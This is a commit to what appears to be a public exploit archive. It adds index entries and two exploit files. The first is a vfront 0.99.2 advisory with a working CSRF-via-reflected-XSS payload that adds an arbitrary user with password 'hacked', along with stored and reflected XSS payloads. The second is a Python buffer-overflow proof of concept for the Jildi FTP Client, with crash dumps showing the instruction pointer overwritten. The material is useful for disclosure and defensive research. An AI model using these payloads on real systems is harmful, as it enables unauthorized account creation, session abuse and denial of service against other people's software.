DB: 2015-06-04

2 new exploits
2015-06-04 05:03:09 +00:00 · 2015-06-04 05:03:09 +00:00 · 0e74581282
commit 0e74581282
parent 222fb2102d
3 changed files with 193 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -33375,6 +33375,7 @@ id,file,description,date,author,platform,type,port
 36980,platforms/windows/local/36980.py,"VideoCharge Express 3.16.3.04  - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
 36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
 36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
 37186,platforms/php/webapps/37186.txt,"vfront-0.99.2 CSRF & Persistent XSS",2015-06-03,"John Page",php,webapps,0
 36984,platforms/windows/remote/36984.py,"i.FTP 2.21 - Time Field SEH Exploit",2015-05-11,"Revin Hadi Saputra",windows,remote,0
 37006,platforms/java/webapps/37006.txt,"Minify 2.1.x 'g' Parameter Cross Site Scripting Vulnerability",2012-03-21,"Ayoub Aboukir",java,webapps,0
 36986,platforms/php/webapps/36986.txt,"Pluck 4.7 - Directory Traversal",2015-05-11,"Wad Deek",php,webapps,0
@ -33563,3 +33564,4 @@ id,file,description,date,author,platform,type,port
 37180,platforms/php/webapps/37180.txt,"WordPress Newsletter Manager Plugin 1.0 Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
 37182,platforms/php/webapps/37182.txt,"WordPress LeagueManager 3.9.11 Plugin - SQLi",2015-06-02,javabudd,php,webapps,0
 37183,platforms/linux/local/37183.c,"PonyOS <= 3.0 - tty ioctl() Local Kernel Exploit",2015-06-02,"Hacker Fantastic",linux,local,0
 37187,platforms/windows/dos/37187.py,"Jildi FTP Client Buffer Overflow PoC",2015-06-03,metacom,windows,dos,21
--- a/platforms/php/webapps/37186.txt
+++ b/platforms/php/webapps/37186.txt
@ -0,0 +1,131 @@
 # Exploit Title:  CSRF & Persistent XSS
 # Google Dork: intitle: CSRF & Persistent XSS
 # Date: 2015-06-02
 # Exploit Author:  John Page (hyp3rlinx)
 # Website: hyp3rlinx.altervista.org/
 # Vendor Homepage: www.vfront.org
 # Software Link: www.vfront.org
 # Version: 0.99.2
 # Tested on: windows 7
 # Category: webapps
 Product:
 ===================================================================================
 vfront-0.99.2 is a PHP web based MySQL & PostgreSQL database management application.
 Advisory Information:
 ====================================
 CSRF, Persistent XSS & reflected XSS
 Vulnerability Detail(s):
 =======================
 CSRF:
 =========
 No CSRF token in place, therefore we can add arbitrary users to the system.
 Persistent XSS:
 ================
 variabili.php has multiple XSS vectors using POST method, one input field 'altezza_iframe_tabella_gid' will store XSS payload
 into the MySQL database which will be run each time variabili.php is accessed from victims browser.
 Persisted XSS stored in MySQL DB:
 =================================
 DB-----> vfront_vfront
 TABLE-----> variabili
 COLUMN------> valore (will contain our XSS)
 Exploit code(s):
 ===============
 CSRF code add arbitrary users to system:
 =======================================
 http://localhost/vfront-0.99.2/vfront-0.99.2/admin/log.php?op="/><script>var xhr%3dnew XMLHttpRequest();xhr.onreadystatechange%3dfunction(){if(xhr.status%3d%3d200){if(xhr.readyState%3d%3d4){alert(xhr.responseText);}}};xhr.open('POST','utenze.db.php?insert_new',true);xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');xhr.send('nome%3dhyp3rlinxe%26cognome%3dapparitionsec%26email%3dx@x.com%26passwd%3dhacked%26passwd1%3dhacked');</script>&tabella=&uid=&data_dal=All&data_al=All
 Persistent XSS:
 ================
 http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php?feed=0&gidfocus=0
 Inject XSS into 'the altezza_iframe_tabella_gid' input field to store in database.
 "/><script>alert(666)</script>
 Reflected XSS(s):
 =================
 http://localhost/vfront-0.99.2/vfront-0.99.2/admin/query_editor.php?id=&id_table=&id_campo="/><script>alert(666)</script>
 XSS vulnerable input fields:
 ============================
 http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php
 altezza_iframe_tabella_gid   <------------- ( Persistent XSS )
 passo_avanzamento_veloce_gid
 n_record_tabella_gid
 search_limit_results_gid
 max_tempo_edit_gid
 home_redirect_gid
 formati_attach_gid
 default_group_ext_gid
 cron_days_min_gid
 Disclosure Timeline:
 ===================================
 Vendor Notification: May 31, 2015
 June 2, 2015 : Public Disclosure
 Severity Level:
 ===================================
 High
 Description:
 ==========================================================
 Request Method(s):
                                [+]  GET & POST
 Vulnerable Product:
                                [+]  vfront-0.99.2
 Vulnerable Parameter(s):
                                [+] altezza_iframe_tabella_gid
 				    passo_avanzamento_veloce_gid
 				    n_record_tabella_gid
 				    search_limit_results_gid
 				    max_tempo_edit_gid
 				    home_redirect_gid
 				    formati_attach_gid
 				    default_group_ext_gid
 				    cron_days_min_gid
 				    id_campo
 				    op
 Affected Area(s):               [+]  Admin & MySQL DB
 ===============================================================
 (hyp3rlinx)
--- a/platforms/windows/dos/37187.py
+++ b/platforms/windows/dos/37187.py
@ -0,0 +1,60 @@
 #!/usr/bin/python
 #Exploit Title:Jildi FTP Client Buffer Overflow Poc
 #Version:1.5.2 Build 1138
 #Homepage:http://de.download.cnet.com/Jildi-FTP-Client/3000-2160_4-10562942.html
 #Software Link:http://de.download.cnet.com/Jildi-FTP-Client/3001-2160_4-10562942.html?hasJs=n&hlndr=1&dlm=0
 #Tested on:Win7 32bit EN-Ultimate
 #Date found:     02.06.2015
 #Date published: 02.06.2015
 #Author:metacom
 '''
 ===========
 Description:
 ===========
 JilidFTP is a powerful ftp-client program for Windows, it fast and reliable
 and with lots of useful features. It supports multi-thread file upload or 
 download , so you can upload or download several files at the same time. 
 The job manager integrates with the Windows scheduler engine ,this provide
 you more freedom and flexibility to upload or download your files. 
 It can also traces changes within a local directory and apply these 
 changes to remote ftp server .The user-friendly interface lets your 
 software distribution, uploading files to a web-server, and providing
 archives for various purposes more easily.
 ============
 How to Crash:
 ============ 
 Copy the AAAA...string from Jildi_FTP.txt to clipboard, open Jildi Ftp and press Connect
 and paste it in the Option -- Name or Address --and press connect.
 ===============================================
 Crash Analysis using WinDBG: Option --> Address
 ===============================================
 (f6c.4fc): Access violation - code c0000005 (!!! second chance !!!)
 eax=00000000 ebx=00000000 ecx=41414141 edx=7790660d esi=00000000 edi=00000000
 eip=41414141 esp=000311cc ebp=000311ec iopl=0         nv up ei pl zr na pe nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
 41414141 ??  
 0:000> !exchain
 0012ef40: 41414141
 Invalid exception stack at 41414141
 ============================================
 Crash Analysis using WinDBG: Option --> Name
 ============================================
 (2ec.dac): Access violation - code c0000005 (!!! second chance !!!)
 eax=00000000 ebx=00000000 ecx=41414141 edx=7790660d esi=00000000 edi=00000000
 eip=41414141 esp=000311cc ebp=000311ec iopl=0         nv up ei pl zr na pe nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
 41414141 ??              ???
 0:000> !exchain
 0012ef40: 41414141
 Invalid exception stack at 41414141
 '''
 filename="Jildi_FTP.txt"
 junk1="\x41" * 20000
 buffer=junk1 
 textfile = open(filename , 'w')
 textfile.write(buffer)
 textfile.close()